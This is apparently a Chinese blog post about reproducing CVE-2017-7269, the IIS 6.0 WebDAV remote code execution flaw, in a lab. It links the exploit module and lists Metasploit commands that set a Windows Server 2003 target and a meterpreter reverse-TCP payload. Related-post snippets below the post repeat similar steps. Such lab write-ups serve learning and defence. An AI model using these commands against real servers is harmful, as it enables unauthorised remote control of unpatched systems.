(CVE-2017-7269)IIS6.0远程代码执行漏洞

最新推荐文章于 2024-06-18 09:33:50 发布
最新推荐文章于 2024-06-18 09:33:50 发布
阅读量722 收藏
点赞数 1
分类专栏: CVE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/114375552
版权

一.漏洞介绍

IIS6.0在Web服务扩展中开启WebDAV,webDAV服务存在缓冲区溢出漏洞,造成远程代码执行

二.漏洞影响

Windows Server 2003

三.复现过程

环境:kali(10.0.78.19)
Windows Server 2003(10.0.78.20)
1.打开Windows Server 2003中IIS的WebDAV
在这里插入图片描述
2.下载EXP
下载网址:https://github.com/zcgonvh/cve-2017-7269
将EXP复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下,方便之后的攻击
在这里插入图片描述
3.开始攻击
1.打开msf,进行配置
命令:use exploit/windows/iis/cve_2017_7269(使用我们下载的exp)
show options(修改配置)
set RHOSTS 10.0.78.20(设置靶机ip)
set HttpHost 10.0.78.20(设置靶机网址)
set payload windows/meterpreter/reverse_tcp(设置返回载荷)
入坑:
复制进去没有重新加载
在这里插入图片描述
这个是最重要的,重新加载后即可使用导入的exp
最后设置:
在这里插入图片描述
可以看到设置目标端口是80
2.因此我们用kali进行目标机端口扫描
在这里插入图片描述
80端口是开启的
3.执行
在这里插入图片描述
发现可以执行但是无法返回shell
在网上搜索资料,我的2003是中文版,应该换成英文版本就可以了
在这里插入图片描述
发现可利用的是R2,正好与msf的targets默认值0相匹配,所以不是targets的问题

番茄酱料
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
cve-2017-7269-iis6.0环境搭建及复现过程
04-30
cve-2017-7269-iis6.0环境搭建及复现过程 有详细的复现过程。及出错记录
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
复现CVE-2017-7269(过程,步骤,说明)
XZ_______的博客
12-20 2966
配置环境:Windows server 2003 靶机 kali2.0以上版本 前言:做实验之前要确定一下靶机与攻击主机可以互相通信 一、配置Windows server 2003 靶机 1、打开添加/删除windows程序点击添加/删除windows组件 2、安装iis6.0中间件: 3、打开iisiis中的webDAV改为允许 4、打开网站找到默认网站右击属性,将ip地址改为本机ip地址 这个时候呢我们的靶机已经配置完毕了,接下来我们来配置我们的kali 二、开启kali (第一次使用msfc
网络安全2017-7269安全漏洞解析
qq_63060814的博客
04-04 6304
1,使用命令zenmap打开nmap图形化扫描工具,选择配置,点击新的配置或命令 找到模块http-webdav-scan,勾上选用该模块对目标靶机进行扫描 根据扫描结果的信息可以找到靶机的操作系统为Microsoft Windows Server 2003 R2,并且开启WebDAV服务的IIS6.0,初步可以确认该漏洞存在 服务器版本信息: 使用msfconsole命令打开metasploit漏洞测试平台 使用search命令搜索cve-2017-7269 ...
探索网络安全的新边界:修复版MSF模块CVE-2017-7269漏洞利用工具
最新发布
gitblog_00066的博客
06-18 415
探索网络安全的新边界:修复版MSF模块CVE-2017-7269漏洞利用工具 项目地址:https://gitcode.com/zcgonvh/cve-2017-7269 在网络安全的世界里,及时发现和修复漏洞至关重要。今天,我们要向您推介一个针对CVE-2017-7269的修复版Metasploit(MSF)模块,这是一个精心优化的工具,能帮助安全研究人员和管理员更有效地测试和防范Windows...
IIS 6.0 WebDAV远程代码执行(CVE-2017-7269) 含POC与修复方法
Anprou的博客
03-28 5406
2015年7月15日,微软已停止对Windows Server 2003的支持,所以官方没有相关解决方案,建议用户升级到最新系统 Windows Server 2016。
CVE-2017-7269IIS远程代码执行
浅笑996的博客
11-20 1359
利用CVE-2017-7269IIS向自己的msf反弹一个shell 确认目标是IIS并且开启webdav 打开msf,使用exp msfconsole use exploit/windows/iis/cve-2017-7269 set rhost 192.168.91.129 show options run 获得一个meterpreter ...
cve-2017-7269远程代码执行漏洞)复现
嗷空酒的博客
12-11 1091
cve_2017_7269漏洞属于高危漏洞,是由Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)发现的。IIS 6.0开启Webdav服务的服务器被爆存在缓存区溢出漏洞导致远程代码随意执行,目前针对 Windows Server 2003 R2 可以稳定利用;
cve-2017-7269-iis6.0 poc metersploit
04-30
cve-2017-7269-iis6.0 的poc 再metersploit中使用,亲测可用。
cve-2017-7269.rb
04-11
msfconsole中,webdav漏洞iis服务提权工具。
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
03-02
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
cve_2017_7269.rb
04-11
IIS6.0远程代码执行漏洞,本文件需要配合MSF使用,使用前把文件放在//usr/share/metasploit-framework/modules/exploits/windows/iis/下
iis6.0cve-2017-7269)最完整的利用,从远程利用,到本地提权,再到常见失败原因
redwand的博客
05-04 1252
网上看到的iis6.0cve-2017-7269)的利用文章,要么只有远程利用不包含本地提权,要么包含本地提权却没有常见失败原因,故有此文 本篇文章面向有一点windows命令行基础,kali基础,msf基础的同学
IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现——踩坑记
W小哥
04-24 2164
一、漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁。 二、影响版本以及利用条件 Windows 2003 R2开启WebDAV服务的IIS6.0 三、漏洞环境搭建 Windows server 2003 R2 安装IIS服务,并且开启了WebDAV Exp下载地址:https://github.com/zcgonvh/cve...
E035-服务漏洞利用及加固-利用CVE-2017-7269漏洞渗透IIS6.0实现远程控制
轻舟已过万重山
10-15 191
Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞远程攻击者通过以“If:
cve-2017-7269环境搭建和漏洞利用
qqqwww_sssd的博客
07-03 567
windows 2003 r2 秘钥:windows 2003 R2 Sp2 64位 企业版MR78C-GF2CY-KC864-DTG74-VMT73windows 2003 R2 Sp2 64位 企业版M6F6D-VFQWH-CGWRB-RC7JR-VCV4Wgithub官网下载地址:GitHub - zcgonvh/cve-2017-7269: fixed msf module for cve-2017-7269个人网盘地址: cve-2017-7269:链接:https://pan.baidu.com
CVE-2017-7269使用教程(解决MSFCONSOLE解决无法加载模块问题)
旺仔Sec&blog
12-15 2084
问题如上 我们先把exp复制到msf目录下面,然后先尝试这打开msf看能不能使用 发现无法加载这个exp,接下来我们来查找问题 通过分析我们可以看到这里面的exp的格式都是下划线,我们试着把刚刚导入的exp也改成这个格式。 导入成功,接下来使用exp进行漏洞利用 漏洞利用成功 ...
iis6.0远程代码执行漏洞
G208_522的博客
11-20 3460
iis6.0远程代码执行漏洞 1、实验环境搭建 目标主机Windows server2003 sp2 2、目标服务器需要在IIS里面开启WebDAV 3、靶机IP:192.168.149.136(需要改成自己虚拟机win2003的地址) Kali IP : 192.168.149.150(需要改成自己虚拟机kali的地址) 4、打开kali并且 把exp 复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下: k
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值